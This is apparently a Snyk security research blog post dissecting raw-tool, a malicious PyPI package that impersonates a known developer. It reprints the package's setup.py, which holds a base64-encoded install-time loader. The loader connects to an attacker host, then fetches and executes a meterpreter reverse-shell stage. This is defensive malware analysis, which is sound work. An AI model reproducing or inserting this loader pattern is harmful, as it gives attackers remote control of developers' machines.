Skip to main content

Phony PyPi package imitates known developer

Written by:

Kyle Suero

October 5, 2022

0 mins read

Snyk Security Researchers have been using dynamic analysis techniques to unravel the behaviors of obfuscated malicious packages. A recent interesting finding in the Python Package Index (PyPi) attempted to imitate a known open source developer through identity spoofing. Upon further analysis, the team uncovered that the package, raw-tool, was attempting to hide malicious behavior using base64 encoding, reaching out to malicious servers, and executing obfuscated code. In this post, we’re going to take a deeper look at that vulnerability, but first let’s take a look at how our researchers discovered it.

Combining dynamic and static analysis at Snyk

There are several ways to categorize the various analyses our Snyk Security Research team performs on code. The main delineations are static analysis and dynamic analysis. Our static analysis tools help with Snyk’s research of malicious packages hiding in open source ecosystems by flagging suspicious code. Static analysis, in the simplest terms, is the examination of files. By analyzing the code in files, Snyk is detecting potentially malicious patterns, reaching out to the package indexers of various ecosystems, and reducing the impact of malicious activity.

Commonly, static analysis is used by developers and coding enterprises to detect vulnerabilities in their proprietary code (security-specific analysis is often referred to as static application security testing, or SAST).As static analysis has become widely adopted by the industry, more detection mechanisms have become developed. Due to the advances in static analysis techniques, malicious actors have had to adapt, adopting new obfuscation techniques to circumvent common static analysis techniques.

Although static analysis gives us a good idea of what may be lurking in files, it can be difficult to interpret what a program may do at runtime without actually executing some of the code it contains. For this reason, people employ dynamic analysis techniques. Dynamic analysis, sometimes called runtime or execution-time analysis, looks at what code does when it actually runs!

This can be extremely telling if some code is, for example, pulling down other resources from the internet, utilizing encrypted or obfuscated code, or maybe even behaving differently while being analyzed. Some of these malware techniques are more difficult to trace fully without running the actual code. That is where dynamic analysis comes in.

Snyk researchers have recently been adopting dynamic analysis techniques further to analyze malware in open source ecosystems. Combining dynamic and static analysis techniques is allowing researchers at Snyk to detect more kinds of suspicious behaviors, analyze malware actors' techniques in even more depth, and further understand the current state of malware in open source package indexers.

Boosting detection with dynamic analysis

In our previous PyPi malware posts, we mostly focused on our detection techniques which leverage static analysis to flag potentially malicious packages. In recent weeks Snyk has been investing time and resources to expand these capabilities and leverage dynamic analysis techniques. While static analysis, analysis without execution, has proven to be successful in detecting a large number of malicious packages so far, it can sometimes be difficult to get a solid grasp of what is happening from a purely static perspective.

To improve our detection rate, Snyk has complemented our detection with dynamic capabilities, monitoring exactly what happens during install and import time. Using traditional software analysis techniques such as network packet capture and monitoring syscalls, we can build a picture of what might have happened by analyzing data such as DNS queries, sockets, file access, and commands executed.

While this doesn’t currently cover malicious functions within the packages themselves, our research has shown that most malicious packages perform their malicious actions earlier rather than later. It makes sense to focus on install and import times for now, but malicious functions are something already on our roadmap to address in the future.

Exploring the PyPi raw-tool malware

This takes us to our earlier example, where we discovered malware in a PyPi package during the early stages of this approach. From monitoring the analysis results, we discovered that the package raw-tool, during its installation, executes unknown binary files and reaches out to a suspicious domain! Let's dive right into the code and see what's happening here.

1import setuptools
2
3exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ3NpZGh1Zy0zNTAxOS5wb3J0bWFwLmlvJywzNTAxOSkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]))
4
5setuptools.setup(name='raw_tool',
6      version='2.0.1',
7      description='Python Distribution Utilities',
8      author='Greg Ward',
9      author_email='gward@python.net',
10      url='https://www.python.org/',
11
12     )

It becomes immediately obvious something isn’t right here when we look at the argument supplied to the exec function. It starts with a simplistic attempt at obfuscation by taking a payload and encoding it with base64. While this does initially hide the real payload, this raises suspicion and is trivial to decode. The payload above decodes to the following:

wordpress-sync/blog-phony-pypi-payload-1

What we see above is fairly simple. The Python code creates a socket to connect to an attacker-controlled server to download a second stage payload, which is then passed through another base64 decoder before being decompressed and passed into exec. In this case, the primary malware was a Python-based meterpreter. This is essentially an improved reverse shell provided by the Metasploit framework, which allows the attacker to execute arbitrary commands and easily perform some additional functions provided by the meterpreter itself via post-exploitation modules.

Thankfully, this malicious package was found and removed from the PyPi infrastructure quickly, ensuring it didn’t continue to create a security risk.

Never stop improving

While this wasn’t the most sophisticated or highly targeted malware, it is a good example of malware providing full remote access to compromised machines via key components of the open source ecosystem and demonstrates that our dynamic analysis pipeline can detect malware hidden in newly uploaded packages quickly. 

Soon, we aim to combine the signals from both our static and dynamic analysis pipelines for improved accuracy in open source research. Knowing that a package makes calls to suspicious functions, contains encoded strings, and reaches out to a suspicious domain at install time provides a much stronger signal than looking at these results in isolation. And as a Snyk user, you’ll be the one to reap the benefits of these new analysis techniques!

Get started in capture the flag

Learn how to solve capture the flag challenges by watching our virtual 101 workshop on demand.

Snyk Top 10: Vulnerabilites you should know

Find out which types of vulnerabilities are most likely to appear in your projects based on Snyk scan results and security research.